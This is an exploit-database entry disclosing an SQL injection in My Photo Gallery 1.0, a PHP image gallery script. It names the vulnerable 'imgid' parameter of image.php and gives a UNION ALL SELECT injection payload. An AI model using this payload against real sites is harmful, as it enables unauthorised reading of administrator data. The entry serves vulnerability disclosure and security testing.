My Photo Gallery 1.0 - SQL Injection

EDB-ID:

41177

CVE:

N/A




Platform:

PHP

Date:

2017-01-27


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

Introduction

Exploit Title: My Photo Gallery – SQL Injection
Date: 27.01.2017
Vendor Homepage: http://software.friendsinwar.com/
Software Link: http://software.friendsinwar.com/news.php?readmore=40
Exploit Author: Kaan KAMIS
Contact: iletisim[at]k2an[dot]com
Website: http://k2an.com
Category: Web Application Exploits
 
Overview
 
My Photo Gallery is a free is a user-friendly picture gallery script.
Users can register and upload their images to the site. A moderator can see the images and validate, edit or delete them.
The script comes with a very user friendly admin system where you can change and add many things such as: Categories, Images, Edit members, site looks and many more.

Type of vulnerability:

An SQL Injection vulnerability in My Photo Gallery allows attackers to read
arbitrary administrator data from the database.

Vulnerable Url:

http://locahost/my_photo_gallery/image.php?imgid=[payload]
Vulnerable parameter : imgid
Mehod : GET

Payload:
imgid=1 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7170767a71,0x6652547066744842666d70594d52797173706a516f6c496f4d4b6b646f774d624a614f52676e6372,0x716b766b71)--